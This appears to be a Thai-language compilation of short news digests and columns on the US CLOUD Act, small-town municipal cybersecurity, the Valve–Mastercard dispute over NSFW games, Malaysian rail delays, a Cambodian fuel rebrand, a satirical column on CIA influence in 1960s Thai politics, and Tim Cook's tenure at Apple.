เรื่องเล่าจากโลกไซเบอร์: US CLOUD Act กับแรงสั่นสะเทือนอธิปไตยข้อมูลไทย

ในยุคที่ข้อมูลคือทรัพย์สินล้ำค่า และ AI คือเครื่องมือแห่งอำนาจ ประเทศมหาอำนาจต่างเร่งสะสม “ข้อมูล” ผ่านเทคโนโลยีคลาวด์และโครงสร้างพื้นฐานดิจิทัล โดยเฉพาะบริษัทสัญชาติสหรัฐที่ครองตลาด hyperscaler ทั่วโลก แต่สิ่งที่หลายคนอาจไม่รู้คือ กฎหมาย CLOUD Act ของสหรัฐฯ ที่ออกในปี 2018 ได้เปลี่ยนเกมนี้ไปอย่างสิ้นเชิง

กฎหมายนี้ให้อำนาจเจ้าหน้าที่สหรัฐเรียกดูข้อมูลจากบริษัทอเมริกันได้ แม้ข้อมูลนั้นจะอยู่ในเซิร์ฟเวอร์ต่างประเทศ เช่น ไทย หรือยุโรป โดยไม่ต้องผ่านรัฐบาลประเทศนั้นเลย และหากบริษัทไม่ยอมส่งข้อมูล ก็ต้องไปโต้แย้งในศาลสหรัฐเอง ไม่ใช่หน้าที่ของรัฐบาลไทยหรือ EU

ผลกระทบจึงไม่ใช่แค่เรื่อง “ความเป็นส่วนตัว” แต่ลามไปถึง “อธิปไตยไซเบอร์” ของประเทศ เช่น ข้อมูลความมั่นคงแห่งชาติ ข้อมูลทางการค้า หรือข้อมูลบุคคลจาก EU ที่อาจละเมิด GDPR ได้ทันทีหากถูกเรียกดูโดยสหรัฐ

หลายประเทศจึงเริ่มตอบโต้ เช่น ฝรั่งเศสออกมาตรฐาน SecNumCloud ที่ห้ามผู้ให้บริการตกอยู่ภายใต้ CLOUD Act เยอรมนีผลักดัน GAIA-X คลาวด์แบบกระจายศูนย์ และออสเตรเลียแม้จะลงนามข้อตกลงกับสหรัฐ แต่ก็ออกกฎหมายบังคับให้เก็บข้อมูลสำคัญในประเทศและเข้ารหัสสองชั้น

สำหรับไทย บทความแนะนำให้เริ่มจากการประเมินประเภทข้อมูล กำหนดตำแหน่งจัดเก็บ ต่อรองสัญญาให้โปร่งใส และวางระบบเข้ารหัสที่เราถือกุญแจเอง เพื่อรักษาสมดุลระหว่างความคล่องตัวทางธุรกิจและอธิปไตยไซเบอร์

CLOUD Act ละเมิดหลักการอธิปไตยข้อมูลของประเทศต่างๆ
โดยเฉพาะเมื่อข้อมูลถูกจัดเก็บโดยบริษัทสหรัฐ แม้ในเซิร์ฟเวอร์ต่างประเทศ

องค์กรไทยอาจตกอยู่ในความเสี่ยงทางกฎหมายทั้งจากสหรัฐและ EU
หากไม่วางแผนการจัดเก็บและเข้ารหัสข้อมูลอย่างรอบคอบ

การใช้คลาวด์ไม่ใช่แค่การส่งออกข้อมูล แต่คือการส่งออก “เขตอำนาจศาล”
เส้นแบ่งแดนในโลกกายภาพไม่รับประกันความเป็นเจ้าของข้อมูล

https://www.thansettakij.com/blogs/columnist/635062

เรื่องเล่าจากข่าว: เมืองเล็ก ๆ กับภัยไซเบอร์ที่ใหญ่เกินตัว

ในยุคที่ทุกอย่างเชื่อมต่อกันผ่านอินเทอร์เน็ต ระบบของเทศบาลและเมืองต่าง ๆ ไม่ได้มีแค่ข้อมูลประชาชน แต่ยังรวมถึงบริการสำคัญ เช่น น้ำ ไฟ การแพทย์ และการรักษาความปลอดภัย ซึ่งหากถูกโจมตี อาจทำให้ทั้งเมืองหยุดชะงักได้ทันที

ปัญหาคือระบบเหล่านี้มักถูกสร้างขึ้นโดยไม่คำนึงถึงความปลอดภัยตั้งแต่ต้น และยังใช้เทคโนโลยีเก่าที่เสี่ยงต่อการถูกเจาะระบบ แถมงบประมาณด้าน cybersecurity ก็ถูกจัดสรรน้อย เพราะต้องแข่งขันกับความต้องการอื่นที่เร่งด่วนกว่า เช่น การซ่อมถนนหรือการจัดการขยะ

นอกจากนี้ เจ้าหน้าที่เทศบาลจำนวนมากยังไม่ได้รับการฝึกอบรมด้านความปลอดภัยไซเบอร์อย่างเพียงพอ ทำให้ตกเป็นเหยื่อของ phishing หรือมัลแวร์ได้ง่าย และเมื่อเกิดเหตุการณ์ขึ้น ผลกระทบอาจลุกลามไปถึงความเชื่อมั่นของประชาชนที่มีต่อรัฐบาลท้องถิ่น

ระบบเทศบาลมีข้อมูลสำคัญและให้บริการพื้นฐาน เช่น น้ำ ไฟ ตำรวจ และดับเพลิง
หากถูกโจมตี อาจทำให้บริการหยุดชะงักและเกิดความไม่ปลอดภัยในชุมชน
ข้อมูลประชาชน เช่น หมายเลขประกันสังคมและประวัติสุขภาพ อาจถูกขโมย

ระบบเหล่านี้มักสร้างขึ้นโดยไม่คำนึงถึงความปลอดภัยตั้งแต่ต้น
ใช้เทคโนโลยีเก่าที่เสี่ยงต่อการถูกเจาะระบบ
ขาดการอัปเดตและการตรวจสอบความปลอดภัยอย่างสม่ำเสมอ

งบประมาณด้าน cybersecurity มักถูกจัดสรรน้อย เพราะมีความต้องการอื่นที่เร่งด่วนกว่า
การอัปเกรดระบบหรือใช้เครื่องมือรักษาความปลอดภัยขั้นสูงจึงทำได้ยาก
ส่งผลให้เมืองเล็ก ๆ กลายเป็นเป้าหมายที่ง่ายสำหรับแฮกเกอร์

เจ้าหน้าที่เทศบาลมักไม่ได้รับการฝึกอบรมด้าน cybersecurity อย่างเพียงพอ
เสี่ยงต่อการตกเป็นเหยื่อของ phishing หรือ social engineering
ความผิดพลาดของมนุษย์เป็นจุดอ่อนหลักของระบบความปลอดภัย

การฝึกอบรมและการร่วมมือกับผู้เชี่ยวชาญภายนอกสามารถช่วยเสริมความปลอดภัยได้
การจัดอบรมอย่างสม่ำเสมอช่วยให้เจ้าหน้าที่รับมือกับภัยคุกคามใหม่ ๆ
การร่วมมือกับบริษัท cybersecurity หรือหน่วยงานรัฐช่วยเพิ่มทรัพยากรและความรู้

นโยบายและกฎระเบียบสามารถสร้างมาตรฐานขั้นต่ำด้านความปลอดภัยให้กับเทศบาล
เช่น การตรวจสอบระบบเป็นระยะ และการฝึกอบรมพนักงานเป็นข้อบังคับ
ช่วยให้เกิดความสม่ำเสมอและความร่วมมือระหว่างเมืองต่าง ๆ

การละเลยด้าน cybersecurity อาจทำให้บริการพื้นฐานของเมืองหยุดชะงักทันทีเมื่อถูกโจมตี
ส่งผลต่อความปลอดภัยของประชาชน เช่น การตอบสนองฉุกเฉินล่าช้า
อาจเกิดความเสียหายทางเศรษฐกิจและสังคมในวงกว้าง

การใช้เทคโนโลยีเก่าโดยไม่มีการอัปเดตเป็นช่องโหว่ที่แฮกเกอร์ใช้เจาะระบบได้ง่าย
ระบบที่ไม่รองรับการป้องกันภัยใหม่ ๆ จะถูกโจมตีได้โดยไม่ต้องใช้เทคนิคซับซ้อน
อาจถูกใช้เป็นฐานโจมตีระบบอื่นในเครือข่าย

การขาดการฝึกอบรมทำให้เจ้าหน้าที่กลายเป็นจุดอ่อนของระบบความปลอดภัย
การคลิกลิงก์ปลอมหรือเปิดไฟล์แนบอันตรายอาจทำให้ระบบถูกแฮก
ความผิดพลาดเล็ก ๆ อาจนำไปสู่การละเมิดข้อมูลครั้งใหญ่

การไม่มีนโยบายหรือมาตรฐานกลางทำให้แต่ละเมืองมีระดับความปลอดภัยไม่เท่ากัน
เมืองที่ไม่มีทรัพยากรอาจไม่มีการป้องกันเลย
ส่งผลต่อความมั่นคงของภูมิภาคโดยรวม

การใช้กรอบการทำงานของ NIST ช่วยให้เทศบาลวางแผนด้าน cybersecurity ได้อย่างเป็นระบบ
ครอบคลุม 5 ด้าน: Identify, Protect, Detect, Respond, Recover
มีเครื่องมือและคู่มือให้ใช้ฟรีจากเว็บไซต์ของ NIST

การทำประกันภัยไซเบอร์ช่วยลดความเสี่ยงทางการเงินเมื่อเกิดเหตุการณ์โจมตี
คุ้มครองความเสียหายจากการละเมิดข้อมูลและการหยุดชะงักของระบบ
แต่ต้องศึกษาข้อกำหนดและค่าใช้จ่ายให้รอบคอบ

การประเมินระบบอย่างสม่ำเสมอช่วยให้รู้จุดอ่อนและปรับปรุงได้ทันเวลา
ใช้เครื่องมือฟรีจาก CISA เช่น Cyber Resilience Review และ CSET
ไม่จำเป็นต้องจ้างบริษัทภายนอกที่มีค่าใช้จ่ายสูงเสมอไป

https://hackread.com/local-government-cybersecurity-municipal-systems-protection/

เรื่องเล่าจากข่าว: เมื่อเกมผู้ใหญ่กลายเป็นภัยต่อแบรนด์—Valve vs Mastercard

เรื่องเริ่มจากการที่ Steam และ Itch.io ลบหรือซ่อนเกม NSFW จำนวนมาก โดยอ้างว่า “ถูกกดดันจาก payment processors” ซึ่งรวมถึง Mastercard ที่ถูกกล่าวหาว่าใช้กฎ Rule 5.12.7 เพื่อปฏิเสธการทำธุรกรรมที่ “อาจทำลายภาพลักษณ์ของแบรนด์”

Mastercard ออกแถลงการณ์ว่า “เราไม่ได้ประเมินเกมใด ๆ หรือสั่งให้ลบเกมจากแพลตฟอร์ม” แต่ Valve โต้กลับทันทีว่า Mastercard สื่อสารผ่านตัวกลาง เช่น payment processors และธนาคารผู้รับชำระเงิน โดยไม่ได้ติดต่อกับ Valve โดยตรง แม้ Valve จะร้องขอให้คุยกันตรง ๆ ก็ตาม

Valve ยืนยันว่า payment processors ปฏิเสธนโยบายของ Steam ที่พยายามเผยแพร่เฉพาะเกมที่ถูกกฎหมาย และอ้างถึง Rule 5.12.7 ว่าเกม NSFW บางประเภท “อาจเป็นภัยต่อแบรนด์ Mastercard” แม้จะไม่ผิดกฎหมายก็ตาม

Mastercard ปฏิเสธว่าไม่ได้สั่งให้ลบเกม NSFW จาก Steam หรือ Itch.io
ระบุว่า “อนุญาตให้ทำธุรกรรมที่ถูกกฎหมายทั้งหมด”
แต่ต้องมีการควบคุมไม่ให้ใช้บัตร Mastercard ซื้อเนื้อหาผิดกฎหมาย

Valve ยืนยันว่า Mastercard สื่อสารผ่านตัวกลาง ไม่เคยคุยตรง ๆ กับ Valve
ใช้ payment processors และ acquiring banks เป็นตัวแทน
Valve ขอคุยตรง ๆ แต่ไม่ได้รับการตอบกลับ

Rule 5.12.7 ของ Mastercard ถูกใช้เป็นเหตุผลในการปฏิเสธเกม NSFW บางประเภท
ห้ามธุรกรรมที่ “ผิดกฎหมาย หรืออาจทำลาย goodwill หรือภาพลักษณ์ของแบรนด์”
รวมถึงเนื้อหาที่ “ลามกอนาจารอย่างชัดเจนและไม่มีคุณค่าทางศิลปะ”

Itch.io ก็ได้รับแรงกดดันเช่นกัน และเริ่มลบเกม NSFW ออกจากแพลตฟอร์ม
โดยเฉพาะเกมที่มีเนื้อหา LGBTQ+ หรือเนื้อหาที่ไม่เข้าข่ายผิดกฎหมาย
ปัจจุบันเริ่มนำเกมฟรีกลับมา และมองหาผู้ให้บริการชำระเงินรายใหม่

GOG ออกแคมเปญ FreedomToBuy เพื่อสนับสนุนสิทธิ์ในการซื้อเกม NSFW
แจกเกม NSFW ฟรีกว่า 1 ล้านชุดในช่วงสุดสัปดาห์
เป็นการตอบโต้การเซ็นเซอร์จาก payment processors

Rule 5.12.7 ของ Mastercard ให้อำนาจในการตัดสินว่าเนื้อหาใด “ไม่เหมาะสม” ได้อย่างกว้างขวาง
แม้เนื้อหาจะไม่ผิดกฎหมาย ก็อาจถูกปฏิเสธได้
ส่งผลให้เกิดการเซ็นเซอร์เนื้อหาที่หลากหลายโดยไม่มีมาตรฐานชัดเจน

การสื่อสารผ่านตัวกลางทำให้เกิดความคลุมเครือและขาดความโปร่งใส
Valve ไม่สามารถเจรจาโดยตรงกับ Mastercard
ทำให้การตัดสินใจลบเกมขาดความชัดเจนและความรับผิดชอบ

การลบเกม NSFW โดยไม่ระบุเหตุผลชัดเจน อาจกระทบต่อผู้พัฒนาเกมอินดี้และชุมชน LGBTQ+
เกมที่ไม่ผิดกฎหมายถูกลบเพราะ “เสี่ยงต่อแบรนด์”
สร้างบรรยากาศแห่งความกลัวและการเซ็นเซอร์ในวงการเกม

การควบคุมเนื้อหาผ่านระบบการชำระเงินอาจกลายเป็นเครื่องมือในการจำกัดเสรีภาพทางศิลปะ
ผู้ให้บริการชำระเงินมีอำนาจเหนือแพลตฟอร์มเกม
อาจนำไปสู่การควบคุมเนื้อหาทางวัฒนธรรมในวงกว้าง

“Patently offensive” เป็นคำที่ตีความได้กว้างและขึ้นอยู่กับดุลยพินิจของบริษัท
ไม่มีมาตรฐานกลางในการวัดคุณค่าทางศิลปะ
อาจถูกใช้เป็นข้ออ้างในการลบเนื้อหาที่ไม่ถูกใจ

Collective Shout กลุ่มนักเคลื่อนไหวจากออสเตรเลียอยู่เบื้องหลังการกดดัน payment processors
เคยส่งจดหมายถึง Mastercard, Visa, PayPal และบริษัทอื่น ๆ
อ้างว่าเกม NSFW เป็น “สื่อลามกที่รุนแรง” และควรถูกลบ

การหาผู้ให้บริการชำระเงินที่สนับสนุนเนื้อหาผู้ใหญ่กลายเป็นทางรอดของแพลตฟอร์มเกมอินดี้
Itch.io กำลังเจรจากับผู้ให้บริการรายใหม่
เพื่อรักษาเสรีภาพในการเผยแพร่เนื้อหาที่ถูกกฎหมาย

https://www.pcgamer.com/games/mastercard-deflects-blame-for-nsfw-games-being-taken-down-but-valve-says-payment-processors-specifically-cited-a-mastercard-rule-about-damaging-the-brand/

ร้องเพลงรอรถไฟ ETS ไปยะโฮร์ ระบบไฟฟ้า-อาณัติสัญญาณยังไม่เสร็จ

ความหวังที่อยากจะนั่งรถไฟ ETS แบบสบายๆ จากกรุงกัวลาลัมเปอร์ ประเทศมาเลเซีย ไปเมืองยะโฮร์บาห์รู เพื่อต่อไปยังประเทศสิงคโปร์ อาจจะเป็นไปได้ยากในปีนี้ เมื่อหนังสือพิมพ์เดอะสตาร์ (The Star) ไปสำรวจโครงการรถไฟทางคู่ขับเคลื่อนด้วยพลังงานไฟฟ้าเกอมัส-ยะโฮร์บาห์รู (Gemas-Johor Bahru Electrified Double-Tracking Rail Project หรือ Gemas - JB EDTP) ระยะทาง 192 กิโลเมตร พบว่าการก่อสร้างระบบไฟฟ้าและระบบอาณัติสัญญาณยังไม่แล้วเสร็จ โดยเฉพาะช่วงระหว่างสถานีกลวง (Kluang) ถึงสถานีเจบี เซ็นทรัล (JB Sentral) ระยะทางราว 100 กิโลเมตร

ก่อนหน้านี้ นายแอนโทนี่ โลค รมว.คมนาคมมาเลเซีย เคยกล่าวไว้เมื่อต้นปี 2568 ว่าบริการรถไฟ ETS จากสถานีเกมัส (Gemas) รัฐเนกรีเซมบิลัน ไปยังเมืองยะโฮร์บาห์รู จะพร้อมให้บริการในเดือน ส.ค.2568 แต่หลังจากเปิดให้บริการช่วงสั้นๆ ไปยังสถานีเซกามัต (Segamat) รัฐยะโฮร์ ตั้งแต่วันที่ 15 มี.ค. ที่ผ่านมา ก็ยังไม่มีความคืบหน้าใดๆ รวมทั้งระบบจำหน่ายตั๋วโดยสารล่วงหน้าของการรถไฟมาลายา (KTM Berhad) พบว่ายังไม่มีการจำหน่ายตั๋วรถไฟ ETS ขาล่องไปยังเมืองทางตอนใต้ใดๆ อีกทั้ง KTMB ยังประกาศระงับการจำหน่ายตั๋วรถไฟหลังเดือน ธ.ค. 2568 จากปกติสามารถจองตั๋วรถไฟล่วงหน้าได้ถึง 6 เดือน

นายยูสลิซาร์ ดาวูด (Yuslizar Daud) ผู้เชี่ยวชาญด้านระบบรถไฟของมาเลเซีย กล่าวว่า กระบวนการในการติดตั้งและทดสอบระบบจ่ายไฟฟ้าเหนือหัวอย่างสมบูรณ์อาจใช้เวลานาน ทั้งการร้อยสายอุปกรณ์สายส่งไฟฟ้าเหนือหัว (OHLE) การดึงสาย การปรับราง การจ่ายไฟ การทดสอบก่อนการใช้งาน และการทดสอบเสมือนจริง (Test & Commissioning) จะใช้เวลานานพอสมควร จากนั้นตรวจสอบขั้นสุดท้ายโดยสํานักงานคณะกรรมการขนส่งทางบกแห่งชาติมาเลเซีย (APAD) ก่อนที่จะได้รับอนุญาต แต่จากภาพที่ผู้สื่อข่าว The Star นำมาแสดงไม่เห็นว่าจะมีความพร้อมเปิดให้บริการในเดือน ก.ย.2568

เข้าใจว่า KTM Berhad กำลังพยายามเร่งเปิดให้บริการจากสถานีเซกามัต ไปยังสถานีกลวง ระยะทาง 90 กิโลเมตรภายในไตรมาสนี้ แม้ดูเหมือนว่า KTM Berhad จะยังไม่ยื่นคำขออนุญาตไปยัง APAD ก็ตาม ขณะเดียวกันยังต้องทดสอบขบวนรถไฟ ETS ชุดใหม่ (ETS 3) ที่นำเข้าจากประเทศจีน ต้องผ่านการทดสอบเดินรถโดยปราศจากข้อบกพร่อง (FFR) อย่างน้อย 8,000 กิโลเมตร ก่อนนำไปให้บริการเชิงพาณิชย์ คาดว่าหาก APAD อนุมัติให้เปิดการเดินรถถึงสถานีกลวง อาจต้องใช้รถไฟ ETS ชุดเก่าไปพลางก่อน ถึงกระนั้นยังต้องรอคำตอบอย่างเป็นทางการจาก KTM Berhad และกระทรวงคมนาคมมาเลเซียอีกครั้ง

#Newskit

มาแล้วแบรนด์น้ำมันใหม่ของเขมร

จาก ปตท. (PTT) เปลี่ยนเป็น พีพีซี (PPC - Peace Petroleum Cambodia)
สีแดง เป็นหนึ่งในสีธงชาติเขมรที่เป็นตัวแทนของกัมพูชา คล้ายสัญชาติของแบรนด์ที่ชาวเขมรสร้างขึ้น
สีขาวสะท้อนถึงความบริสุทธิ์ อ่อนโยน ความซื่อสัตย์ และสันติภาพ เหมือนนิสัยของชาวเขมรที่รักความสงบ มีทัศนคติที่ซื่อสัตย์
สีเบจสะท้อนความแข็งแกร่ง ความเชื่อมั่นและความยั่งยืน ดั่งความมุ่งมั่นของแบรนด์ที่จะให้บริการด้วยมาตรฐานที่เข้มแข็ง คุณภาพ และความไว้วางใจแก่ลูกค้า
นกพิราบสะท้อนถึงเสรีภาพและสันติภาพเช่นเดียวกับประกาศอิสรภาพของ PPC ที่หลุดพ้นอิทธิพลของ PTT
สีทอง สะท้อนถึงความเก่งกาจ และอุดมการณ์ ที่จะทะยานไปสู่ความรุ่งโรจน์ของชาวเขมร

ตอน 8
พ.ศ.2506 คุณป๋าสฤษดิ์ก็หมดบุญ น้าหนอมของป้าจงก็ขึ้นมาเป็นนายกรัฐมนตรีคนที่ 10 อีกครั้งหนึ่ง พี่เบิ้มบอกว่า น้าหนอมน่าเอ็นดู แต่เด็ดไม่ขาด ไม่มีบารมี การสั่งการจากที่เคยคุยแต่กับคุณป๋าคนเดียวก็รู้เรื่อง ที่นี้ก็ต้องคุยเป็นพวง ถนอม ประภาส จิตติ ทวี กฤษณ์ฯลฯ
แล้วไง ทำเป็นไม่รู้เรื่อง คุย 1 คน จ่าย 100 คุย 5 คน ก็เอา 5 คูณ
พี่เบิ้มถึงจะรวยก็ขี้เหนียวนะ มาเล่นวิ่งผลัด 100 x 5 กับไอนี่ ไอไม่ชอบนะ
ช่วงนั้นสถานการณ์ด้านการรบก็กำลังเข้ม การบริหารประเทศไทยแลนด์ของยูก็ไม่มีเอกภาพ แบ่งชามข้าวกันอยู่นั้น เอ้า! พจน์ สารสิน (อีกแล้ว!) ยูมาคุมกระทรวงพัฒนาแห่งชาติหน่อย อย่างน้อยไอก็ไม่ต้องปวดหมองด้านการพัฒนาเศรษฐกิจ เดี๋ยวเงินไหลเข้าไหลออกมันจะสะดุด แล้วพจน์ ยูก็มาทำหน้า ที่เป็นกระบอกเสียงระหว่างน้าหนอมกับไอด้วยนะ เวลาพี่เบิ้มจะเอาอะไรก็บอก good boy ชื่อ พจน์ พจน์ก็ไปบอกน้าหนอม ไม่งั้นสั่งอะไรน้าหนอมก็พยักหน้าอย่างเดียว ไม่รู้ว่ารู้เรื่องหรือเปล่า
สถานการณ์วิ่งผลัดก็ดำเนินไปเรื่อยๆ เขาเข้ามาใช้บ้านเราเป็นฐานทัพทั้งบก เรือ อากาศ นี่ดีว่าไม่มีเรือดำนำนะ ถามว่า ภายใต้พันธะอะไร ข้อตกลงอะไร เคยรู้กันบ้างไหมว่า เขาเข้ามากันเปล่าๆ ไม่เคยมีสัญญาข้อตกลงเป็นรูปธรรมเลยระหว่างสหรัฐกับไทย ก็มันสมประโยชน์กันทั้ง 2 ฝ่าย สหรัฐก็ไม่ต้องแจงรัฐสภาของตัวเอง ไทยก็ไม่ต้องแจงรัฐสภาของไทย เพราะทุกอย่างอยู่ในกำมือ บอกแล้วเงินช่วย เหลือเข้ามา ก็คนละหนุบละหนับ เขียนแล้วมันเศร้าใจ
ทหารอเมริกันก็ไม่ต้องขึ้นศาลไทย เครื่องบินจะบินขึ้นไปทิ้งบอมบ์เขาก็เป็นคนอนุมัติ เขาจะขนทหารเข้ามาเท่าไหร่ เราก็ o.k, o.k
นี่คือสิทธิสภาพนอกอาณาเขต ยุคสงครามเวียตนาม แล้วนึกว่าหมดแล้วหรือ เปล่าเลยแล้วให้จำสัญญาJUSMAC ปี ค.ศ.1950 ที่ท่านนายพลคนแปลก เป็นผู้ลงนามไว้ บอกไว้แล้วว่า สัญญานั้นยังมีชีวิตอยู่ สัญญานี้มีผลอย่างไร เกี่ยวกับปัจจุบันหรือไม่ โปรดติดตาม อย่าได้ขาดตอนเชียว
ช่วงปี พ.ศ.2507 – 2511 คอมมิวนิสต์เริ่มรุกเข้าอีสานบ้านเรา พี่เบิ้มก็ทุ่มเงินใส่ให้พัฒนาหมู่บ้านและตชด. กับตำรวจภูธรเพื่อดูแลหมู่บ้าน ตอนนี้เข้าใจแล้วใช่ไหม ทำไมเขาต้องตั้งตชด.และตั้งตำรวจ ภูธรให้เรา ทหารนั้นเอาไว้ไปรบกับเวียดกง โว้ย! สั่งทุกอย่างเหมือนเป็นบ้านตัวเองเลยนะ
เงินที่พี่เบิ้มให้มาผ่านโครงการ MAP (Military Assistance Program) โดยให้ผ่านหน่วยงาน USIS และ USOM ปีละตั้งหลาย (ประมาณ 100 ล้านเหรียญต่อปีพี่เบิ้มเขาก็เป็นห่วงว่าเงิน MAP นี่มันจะไปใช้สนับสนุนกีฬาวิ่งผลัด 100 x 5 เท่าไหร่ จะถึงตชด.เท่าไหร่  เขาเลยเข้ามาวางแผนเข้าไปถึงระบบพัฒนาหมู่บ้านเราเอง จัดสรรงบเอง เพื่อไม่ให้กีฬาวิ่งผลัดเบิกบานเกินไป และเพื่อให้การเมืองไทยมีเสถียรภาพ สามารถรับใช้การปฏิบัติงานของเจ้าของเงินได้อย่างราบรื่น พี่เบิ้มก็ต้องการให้ไทยแลนด์มีการเลือกตั้ง เป็นประชาธิปไตยจริงๆ เสียที เพราะว่า ค่าใช้จ่ายกีฬาวิ่งผลัดมันชักจะสูงไปแล้วนะ แทน ที่จะคุยกับนักกีฬาวิ่งผลัด คุยกับรัฐบาลมันน่าจะประหยัดค่าใช้จ่ายไอมากกว่านะ แต่ต้องเป็นรัฐบาลจากพรรคที่ไอเลือกให้ เป็นรัฐบาลนะ
คิดกลับไปกลับมา พี่เบิ้มก็ปวดหัวว่าจะใช้บริการของใครดีหนอ น้าหนอมน่าจะดีที่สุด ท่าทางนอนง่ายสอนง่าย ไม่ค่อยมีพยศ รายงานของ CIA ระบุว่า สหรัฐมีแผนที่จะให้กลุ่มถนอมเป็นผู้บริหารประเทศไทยต่อไป ดังนั้นจึงมีการเจรจากับทูตอเมริกันนามว่าคุณมาร์ติน ให้อเมริกาสนับสนุนการตั้งพรรคของ กลุ่มถนอม
ได้ยินเสียงตัวแทนฝ่ายไทย คล้ายๆ เสียงนายพจน์ สารสิน บอกเลือกตั้งน่ะนะ มันต้องใช้ทุนแยะอยู่ ถ้ายูช่วยพวกไอก็จะดี จะได้ไม่ต้องไปเอาจากพ่อค้า ซึ่งส่วนมากเป็นคนจีน มันยากจะเดาว่าจะเอียงหน้าไปอยู่ข้างไหน
รายงาน CIA บอกว่าทูตมาร์ตินนำเรื่องนี้ไปเสนอต่อ 303 Committee ปรากฏว่าทางวอชิงตัน (Washington) ก็ถามกลับมาว่า คุ้มแน่นะ คำตอบก็อยู่ในสายลมที่พัดไป แล้วก็เงียบหาย ระหว่างนั้นไทยแลนด์ก็เลยมีข่าวลือว่า จะมีการปฎิวัติน้าหนอมโดยกลุ่มทวี จิตติ กฤษณ์บ้าง ลุงตุ๊บ้าง แต่ระยะหลังข่าวปฎิวัติโดยลุงตุ๊มาแรง แหม มันประจวบเหมาะอะไรเช่นนั้น บังเอิญจริงนะ
ช่วงข่าวปฏิวัติโดยลุงตุ๊ ทูตมาร์ตินก็หมดวาระกลับบ้าน ทูตอังเกอร์ (Unger) มาแทน คุณ good boy นามพจน์ ก็ไปเตือนทูตใหม่อีกว่า ยูจะเอายังไง ข่าวปฎิวัติมาแรงนะ ถ้ายูจะให้ถนอมเป็นนายกนี่ต้องเร่งๆ หน่อย เราจะตั้งพรรคแล้วหนา เงินที่ว่าจะช่วยยังไม่มาเลย
ทูตตั้งคำถาม 20 คำถาม แล้วก็มีประโยคทองตอบไปเป็นเกียรติประวัติว่า “Trust us-We know what to do” เชื่อเราน่า เรารู้ว่าจะต้องทำยังไง …ไอรวยจะตาย ยูไม่ต้องห่วง ธุรกิจแยะไปหมด น้ำดำไทยแลนด์นี่ก็ของไอนะ (ไม่ได้ค่าโฆษณาไม่เขียนให้รอบสอง!)
ทูตอังเกอร์ (Unger) ได้ยินประโยคทอง แล้วก็อ่อนระทวยเขียนรายงานชื่อว่า “Lotus Project” ส่งด่วนจี๋ไปยังวอชิงตัน (Washington) ทันทีอีกรอบ การเลือกตั้งในวันที่ 11 ก.พ. พ.ศ.2512 ปรากฏว่า พรรคสหประชาไทยของน้าหนอม ได้รับชัยชนะเฉียดฉิวมากคือ 75 ที่นั่งจากสส.ทั้งหมด 215 คน เก่งจังเลย!
การเลือกตั้งครั้งนี้สมควร บันทึกไว้เป็นประวัติศาสตร์ว่าอำนวยการสร้างโดย CIA ของแท้ ภายใต้ชื่อว่า Lotus Project  มีนายพจน์ สารสินเป็น project manger ทั้งนี้เพราะพี่เบิ้มกลัวว่า ถ้าการเมืองไทยไม่นิ่ง Pax Americana ที่วางไว้ซับซ้อนก็จะ ฉ.ห. ดังนั้นพรรคสหประชาไทย ภายใต้การดำเนินงานของนายพจน์ จึงเกิด ขึ้น และชนะการเลือกตั้งและได้นายกชื่อ พล.อ. ถนอม!
ไอ้ที่เขียนเกี่ยวกับ Lotus Project มาทั้งหมดนี้นี้ อยู่ในรายงานลับของทูตมาร์ติน และทูตอังเกอร์ เองนะ ไม่ ได้ยกเมฆ แหม ลับยังไงก็หลุดมาได้น่า สีมือระดับนี่แล้ว เดี๋ยวว่าคุย (ฮา)
โม้มาก สงสัย คงมีพวกซีมาคอยรับตัวไปเที่ยวแน่
Lotus Project ใช้เงินหลวงของพี่เบิ้มอุดหนุน ภายใต้การพิจารณาอนุมัติของ Committer 303 ไปหาดูแล้วกัน ไอ้ Committee นี้มันทำอะไร แล้วอย่ามาพูดอีกนะ ยูต้องเป็นประชาธิปไตย เหม็นขี้ฟันจริงๆ


คนเล่านิทาน

เรื่องเล่าจากข่าว: Tim Cook กับบทบาทที่ยาวนานที่สุดในฐานะ CEO ของ Apple และความหวังในโลก Spatial Computing

ในเดือนสิงหาคม 2025 Tim Cook ครบรอบ 14 ปีในการดำรงตำแหน่ง CEO ของ Apple ซึ่งนานกว่า Steve Jobs ผู้เป็นตำนานของบริษัท โดย Cook เข้ามารับตำแหน่งในปี 2011 หลังจาก Jobs ลาออกเพียงสองเดือนก่อนเสียชีวิต

ตลอดระยะเวลาที่ผ่านมา Cook ได้เปลี่ยนโฉม Apple จากบริษัทที่เน้นอุปกรณ์พกพา สู่การพัฒนาอุปกรณ์สวมใส่ (Wearables) อย่าง Apple Watch และ AirPods รวมถึงการผลิตคอนเทนต์สตรีมมิ่ง และการเปลี่ยนมาใช้ชิป Arm ที่พัฒนาเองใน Mac

หนึ่งในผลิตภัณฑ์ที่ Cook ภูมิใจคือ Vision Pro—แว่นผสมโลกเสมือนจริงที่เปิดตัวด้วยราคาสูงถึง $3,500 แม้จะถูกวิจารณ์เรื่องความเทอะทะและแอปพลิเคชันที่ยังไม่ตอบโจทย์ แต่ Cook ยืนยันว่า Vision Pro คือ “ความสำเร็จในแง่ของการสร้างระบบนิเวศ” และจะค่อย ๆ ดีขึ้นตามเวลา

Apple เตรียมอัปเดต visionOS ด้วยฟีเจอร์ใหม่ เช่น วิดเจ็ตแบบปรับแต่งได้ และเบราว์เซอร์ 3 มิติ พร้อมผลักดันให้บริษัทอื่นสร้างประสบการณ์เชิงพื้นที่ เช่น เครื่องจำลองการบินของ CTE

ในด้าน AI Cook เปิดตัว “Apple Intelligence” โดยเน้นว่าไม่จำเป็นต้องเป็นเจ้าแรก แต่ต้อง “ดีที่สุดสำหรับผู้ใช้” และจะไม่คิดค่าบริการเพิ่มเติม เพราะมองว่าเป็นฟีเจอร์พื้นฐานเหมือนมัลติทัช

แม้ Cook จะมีอายุ 63 ปี แต่แหล่งข่าวระบุว่าเขาอาจอยู่ในตำแหน่งอีก 3 ปี โดยผู้สืบทอดที่ถูกจับตามอง ได้แก่ John Ternus (หัวหน้าฝ่ายฮาร์ดแวร์), Jeff Williams (COO), Craig Federighi (หัวหน้าฝ่ายซอฟต์แวร์) และ Deirdre O’Brien (หัวหน้าฝ่ายค้าปลีก)

Tim Cook ดำรงตำแหน่ง CEO ของ Apple นานกว่า Steve Jobs แล้ว
ครบรอบ 14 ปีในเดือนสิงหาคม 2025
เข้ารับตำแหน่งหลัง Jobs ลาออกในปี 2011

Cook ผลักดันผลิตภัณฑ์ใหม่หลายอย่าง เช่น Apple Watch, AirPods และ Vision Pro
เปลี่ยน Mac มาใช้ชิป Arm ที่พัฒนาเอง
